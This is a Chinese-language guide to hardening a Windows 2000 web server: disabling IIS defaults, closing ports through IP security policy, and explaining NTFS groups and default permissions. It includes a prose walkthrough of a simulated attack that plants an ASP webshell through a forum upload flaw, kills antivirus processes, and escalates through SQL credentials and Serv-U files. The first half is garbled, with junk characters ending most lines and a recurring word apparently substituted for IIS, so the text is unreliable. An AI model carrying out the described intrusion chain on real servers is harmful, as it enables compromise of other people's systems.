&; 作為校園網的伺服器，很多學校將該伺服器同時作為網站伺服器，而第二的漏洞也是一個棘手的問題。實際上，你可以通過簡單的設置，完全可以將網站的漏洞補上。你可以將第二默認的服務都停止(如圖 1，FTP服務你是不需要的，要的話筆者推薦用Serv-U；「管理網站點」和「默認網站點」都會給你帶來麻煩；簡單郵件傳輸協議一般也不用)，然後再新建一個網站點&h
&;設置好常規內容後，在「屬性→主目錄」的配置中對應用程序映射進行設置，刪除不需要的映射(如圖 2)，這些映射是第二受到攻擊的直接原因。如果你需要CGI和PHP的話，可參閱一些資料進行設置LB
這樣，配合常規設置，你的第二就可以安全運行了，你的伺服器就有了第二道防線。>#_t1)
運用掃描程序，堵住安全漏洞[J=
&;要做到全面解決安全問題，你需要掃描程序的幫助。筆者推薦使用X瀏覽(如圖 3)，它可以幫助你檢測伺服器的安全問題。rmp
掃描完成後，你要看一下，是否存在口令漏洞，若有，則馬上要修改口令設置；再看一下是否存在第二漏洞，若有，請檢查第二的設置。其他漏洞一般很少存在，我要提醒大家的是注意開放的埠，你可以將掃描到的埠記錄下來，以方便進行下一步設置。vY)
&; 封鎖埠，全面構建防線YD_\1
&;《 黑客大多通過埠進行入侵，所以你的伺服器只能開放你需要的埠，那麼你需要哪些埠呢？以下是常用埠，你可根據需要取捨：7e|
80為網網站服務；21為FTP服務；25為電子郵件簡單郵件傳輸協議服務；110為發郵件給POP3服務。?[U
&; 其他還有SQL服務者的埠1433等，你可到網上查找相關資料。那些不用的埠一定要關閉！關閉這些埠，我們可以通過Windows 2000的安全策略進行。B
&;《藉助它的安全策略，完全可以阻止入侵者的攻擊。你可以通過「管理工具→本地安全策略」進入，右擊「IP安全策略」，選擇「創建IP安全策略」，點[下一步]。輸入安全策略的名稱，點[下一步]，一直到完成，你就創建了一個安全策略OkQcy
接著你要做的是右擊「IP安全策略」，進入管理IP篩選器和篩選器操作，在管理IP篩選器列表中，你可以添加要封鎖的埠，這里以關閉ICMP和 139埠為例說明。b]}
關閉了ICMP，黑客軟體如果沒有強制掃描功能就不能掃描到你的機器，也砰不到你的機器。關閉ICMP的具體操作如下：點[添加]，然後在名稱中輸入「關閉ICMP」，點右邊的[添加]，再點[下一步]。在源地址中選「任何IP地址」，點[下一步]。在目標地址中選擇「我的IP地址」，點[下一步]。在協議中選擇「ICMP」，點[下一步]。回到關閉ICMP屬性窗口，即關閉了ICMP。sf7 FQ
下面我們再設置關閉 139，同樣在管理IP篩選器列表中點「添加」，名稱設置為「關閉 139」，點右邊的「添加」，點[下一步]。在源地址中選擇「任何IP地址」，點[下一步]。在目標地址中選擇「我的IP地址」，點[下一步]。在協議中選擇「TCP」，點[下一步]。在設置IP協議埠中選擇從任意埠到此埠，在此埠中輸入 139，點下一步。即完成關閉 139埠，其他的埠也同樣設置，結果如圖 5。f6WL
特別指出的是關閉UDP4000可以禁止校園網中的機器使用QQ。Q
&;然後進入設置管理篩選器操作，點「添加」，點下一步，在名稱中輸入「拒絕」，點下一步。選擇「阻止」，點[下一步]。u然後關閉該屬性頁，右擊新建的IP安全策略「安全」，打開屬性頁。在規則中選擇「添加」，點[下一步]。選擇「此規則不指定隧道」，點下一步。在選擇網路類型中選擇「所有網路連接」，點下一步。在IP篩選器列表中選擇「關閉ICMP」，點[下一步]。在篩選器操作中選擇「拒絕」，點下一步。這樣你就將「關閉ICMP」的篩選器加入到名為「安全」的IP安全策略中。同樣的方法，你可以將「關閉 139」等其他篩選器加入進來。添加後的結果如圖 7。(8
&;《我 最後要做的是指派該策略，只有指派後，它才起作用。方法是右擊「安全」，在菜單中選擇「所有任務」，選擇「指派」。IP安全設置到此結束，你可根據自己的情況，設置相應的策略。2
&;《設置完成後，你可再用X瀏覽進行檢查，發現問題再補上。9g
通過以上的設置，你的Windows 2000伺服器可以說是非常安全了。希望你早日築起伺服器的安全防護林。
Windows下許可權設置詳解
隨著動網論壇的廣泛應用和動網上傳漏洞的被發現以及SQL注入式攻擊越來越多的被使用，WEBSHELL讓防火牆形同虛設，一台即使打了所有微軟補丁、只讓80埠對外開放的WEB伺服器也逃不過被黑的命運。難道我們真的無能為力了嗎？其實，只要你弄明白了NTFS系統下的許可權設置問題，我們可以對crackers們說：NO! 要打造一台安全的WEB伺服器，那麼這台伺服器就一定要使用NTFS和Windows NT/2000/2003。眾所周知，Windows是一個支持多用戶、多任務的操作系統，這是許可權設置的基礎，一切許可權設置都是基於用戶和進程而言的，不同的用戶在訪問這台計算機時，將會有不同的許可權。DOS是個單任務、單用戶的操作系統。但是我們能說DOS沒有許可權嗎？不能！當我們打開一台裝有DOS操作系統的計算機的時候，我們就擁有了這個操作系統的管理員許可權，而且，這個許可權無處不在。所以，我們只能說DOS不支持許可權的設置，不能說它沒有許可權。隨著人們安全意識的提高，許可權設置隨著NTFS的發布誕生了。
Windows NT里，用戶被分成許多組，組和組之間都有不同的許可權，當然，一個組的用戶和用戶之間也可以有不同的許可權。下面我們來談談NT中常見的用戶組。 Administrators,管理員組，默認情況下，Administrators中的用戶對計算機/域有不受限制的完全訪問權。分配給該組的默認許可權允許對整個系統進行完全控制。所以，只有受信任的人員才可成為該組的成員。
Power Users，高級用戶組，Power Users 可以執行除了為 Administrators 組保留的任務外的其他任何操作系統任務。分配給 Power Users 組的默認許可權允許 Power Users 組的成員修改整個計算機的設置。但Power Users 不具有將自己添加到 Administrators 組的許可權。在許可權設置中，這個組的許可權是僅次於Administrators的。
Users:普通用戶組，這個組的用戶無法進行有意或無意的改動。因此，用戶可以運行經過驗證的應用程序，但不可以運行大多數舊版應用程序。Users 組是最安全的組，因為分配給該組的默認許可權不允許成員修改操作系統的設置或用戶資料。Users 組提供了一個最安全的程序運行環境。在經過 NTFS 格式化的卷上，默認安全設置旨在禁止該組的成員危及操作系統和已安裝程序的完整性。用戶不能修改系統注冊表設置、操作系統文件或程序文件。Users 可以關閉工作站，但不能關閉伺服器。Users 可以創建本地組，但只能修改自己創建的本地組。
Guests:來賓組，按默認值，來賓跟普通Users的成員有同等訪問權，但來賓帳戶的限制更多。
Everyone:顧名思義，所有的用戶，這個計算機上的所有用戶都屬於這個組。
其實還有一個組也很常見，它擁有和Administrators一樣、甚至比其還高的許可權，但是這個組不允許任何用戶的加入，在察看用戶組的時候，它也不會被顯示出來，它就是SYSTEM組。系統和系統級的服務正常運行所需要的許可權都是靠它賦予的。由於該組只有這一個用戶SYSTEM，也許把該組歸為用戶的行列更為貼切。
許可權是有高低之分的，有高許可權的用戶可以對低許可權的用戶進行操作，但除了Administrators之外，其他組的用戶不能訪問 NTFS 卷上的其他用戶資料，除非他們獲得了這些用戶的授權。而低許可權的用戶無法對高許可權的用戶進行任何操作。
我們平常使用計算機的過程當中不會感覺到有許可權在阻撓你去做某件事情，這是因為我們在使用計算機的時候都用的是Administrators中的用戶登陸的。這樣有利也有弊，利當然是你能去做你想做的任何一件事情而不會遇到許可權的限制。弊就是以 Administrators 組成員的身份運行計算機將使系統容易受到特洛伊木馬、病毒及其他安全風險的威脅。訪問 Internet 站點或打開電子郵件附件的簡單行動都可能破壞系統。不熟悉的 Internet 站點或電子郵件附件可能有特洛伊木馬代碼，這些代碼可以下載到系統並被執行。如果以本地計算機的管理員身份登錄，特洛伊木馬可能使用管理訪問權重新格式化您的硬碟，造成不可估量的損失，所以在沒有必要的情況下，最好不用Administrators中的用戶登陸。Administrators中有一個在系統安裝時就創建的默認用戶----Administrator，Administrator 帳戶具有對伺服器的完全控制許可權，並可以根據需要向用戶指派用戶權利和訪問控制許可權。因此強烈建議將此帳戶設置為使用強密碼。永遠也不可以從 Administrators 組刪除 Administrator 帳戶，但可以重命名或禁用該帳戶。由於大家都知道「管理員」存在於許多版本的 Windows 上，所以重命名或禁用此帳戶將使惡意用戶嘗試並訪問該帳戶變得更為困難。對於一個好的伺服器管理員來說，他們通常都會重命名或禁用此帳戶。Guests用戶組下，也有一個默認用戶----Guest,但是在默認情況下，它是被禁用的。如果沒有特別必要，無須啟用此賬戶。我們可以通過「控制面板」--「管理工具」--「計算機管理」--「用戶和用戶組」來查看用戶組及該組下的用戶。
我們用滑鼠右鍵單擊一個NTFS卷或NTFS卷下的一個目錄，選擇「屬性」--「安全」就可以對一個卷，或者一個卷下面的目錄進行許可權設置，此時我們會看到以下七種許可權：完全控制、修改、讀取和運行、列出文件夾目錄、讀取、寫入、和特別的許可權。「完全控制」就是對此卷或目錄擁有不受限制的完全訪問。地位就像Administrators在所有組中的地位一樣。選中了「完全控制」，下面的五項屬性將被自動被選中。「修改」則像Power users，選中了「修改」，下面的四項屬性將被自動被選中。下面的任何一項沒有被選中時，「修改」條件將不再成立。「讀取和運行」就是允許讀取和運行在這個卷或目錄下的任何文件，「列出文件夾目錄」和「讀取」是「讀取和運行」的必要條件。「列出文件夾目錄」是指只能瀏覽該卷或目錄下的子目錄，不能讀取，也不能運行。「讀取」是能夠讀取該卷或目錄下的數據。「寫入」就是能往該卷或目錄下寫入數據。而「特別」則是對以上的六種許可權進行了細分。讀者可以自行對「特別」進行更深的研究，鄙人在此就不過多贅述了。
下面我們對一台剛剛安裝好操作系統和服務軟體的WEB伺服器系統和其許可權進行全面的刨析。伺服器採用Windows 2000 Server版，安裝好了SP4及各種補丁。WEB服務軟體則是用了Windows 2000自帶的IIS 5.0，刪除了一切不必要的映射。整個硬碟分為四個NTFS卷，C盤為系統卷，只安裝了系統和驅動程序；D盤為軟體卷，該伺服器上所有安裝的軟體都在D盤中；E盤是WEB程序卷，網站程序都在該卷下的WWW目錄中；F盤是網站數據卷，網站系統調用的所有數據都存放在該卷的WWWDATABASE目錄下。這樣的分類還算是比較符合一台安全伺服器的標准了。希望各個新手管理員能合理給你的伺服器數據進行分類，這樣不光是查找起來方便，更重要的是這樣大大的增強了伺服器的安全性，因為我們可以根據需要給每個卷或者每個目錄都設置不同的許可權，一旦發生了網路安全事故，也可以把損失降到最低。當然，也可以把網站的數據分布在不同的伺服器上，使之成為一個伺服器群，每個伺服器都擁有不同的用戶名和密碼並提供不同的服務，這樣做的安全性更高。不過願意這樣做的人都有一個特點----有錢:)。好了，言歸正傳，該伺服器的資料庫為MS-SQL，MS-SQL的服務軟體SQL2000安裝在d:\ms-sqlserver2K目錄下，給SA賬戶設置好了足夠強度的密碼，安裝好了SP3補丁。為了方便網頁製作員對網頁進行管理，該網站還開通了FTP服務，FTP服務軟體使用的是SERV-U 5.1.0.0，安裝在d:\ftpservice\serv-u目錄下。殺毒軟體和防火牆用的分別是Norton Antivirus和BlackICE,路徑分別為d:\nortonAV和d:\firewall\blackice,病毒庫已經升級到最新，防火牆規則庫定義只有80埠和21埠對外開放。網站的內容是採用動網7.0的論壇,網站程序在e:\www\bbs下。細心的讀者可能已經注意到了，安裝這些服務軟體的路徑我都沒有採用默認的路徑或者是僅僅更改盤符的默認路徑，這也是安全上的需要，因為一個黑客如果通過某些途徑進入了你的伺服器，但並沒有獲得管理員許可權，他首先做的事情將是查看你開放了哪些服務以及安裝了哪些軟體，因為他需要通過這些來提升他的許可權。一個難以猜解的路徑加上好的許可權設置將把他阻擋在外。相信經過這樣配置的WEB伺服器已經足夠抵擋大部分學藝不精的黑客了。讀者可能又會問了：「這根本沒用到許可權設置嘛！我把其他都安全工作都做好了，許可權設置還有必要嗎？」當然有！智者千慮還必有一失呢，就算你現在已經把系統安全做的完美無缺，你也要知道新的安全漏洞總是在被不斷的發現。許可權將是你的最後一道防線！那我們現在就來對這台沒有經過任何許可權設置，全部採用Windows默認許可權的伺服器進行一次模擬攻擊，看看其是否真的固若金湯。
假設伺服器外網域名為http://www.webserver.com，用掃描軟體對其進行掃描後發現開放WWW和FTP服務，並發現其服務軟體使用的是IIS 5.0和Serv-u 5.1，用一些針對他們的溢出工具後發現無效，遂放棄直接遠程溢出的想法。打開網站頁面，發現使用的是動網的論壇系統，於是在其域名後面加個/upfile.asp，發現有文件上傳漏洞，便抓包，把修改過的ASP木馬用NC提交，提示上傳成功，成功得到WEBSHELL，打開剛剛上傳的ASP木馬，發現有MS-SQL、Norton Antivirus和BlackICE在運行，判斷是防火牆上做了限制，把SQL服務埠屏蔽了。通過ASP木馬查看到了Norton Antivirus和BlackICE的PID，又通過ASP木馬上傳了一個能殺掉進程的文件，運行後殺掉了Norton Antivirus和BlackICE。再掃描，發現1433埠開放了，到此，便有很多種途徑獲得管理員許可權了，可以查看網站目錄下的conn.asp得到SQL的用戶名密碼，再登陸進SQL執行添加用戶，提管理員許可權。也可以抓SERV-U下的ServUDaemon.ini修改後上傳，得到系統管理員許可權。還可以傳本地溢出SERV-U的工具直接添加用戶到Administrators等等。大家可以看到，一旦黑客找到了切入點，在沒有許可權限制的情況下，黑客將一帆風順的取得管理員許可權。
那我們現在就來看看Windows 2000的默認許可權設置到底是怎樣的。對於各個卷的根目錄，默認給了Everyone組完全控制權。這意味著任何進入電腦的用戶將不受限制的在這些根目錄中為所欲為。系統卷下有三個目錄比較特殊，系統默認給了他們有限制的許可權，這三個目錄是Documents and settings、Program files和Winnt。對於Documents and settings，默認的許可權是這樣分配的：Administrators擁有完全控制權；Everyone擁有讀&運，列和讀許可權；Power users擁有讀&運，列和讀許可權；SYSTEM同Administrators;Users擁有讀&運，列和讀許可權。對於Program files，Administrators擁有完全控制權；Creator owner擁有特殊許可權;Power users有完全控制權;SYSTEM同Admin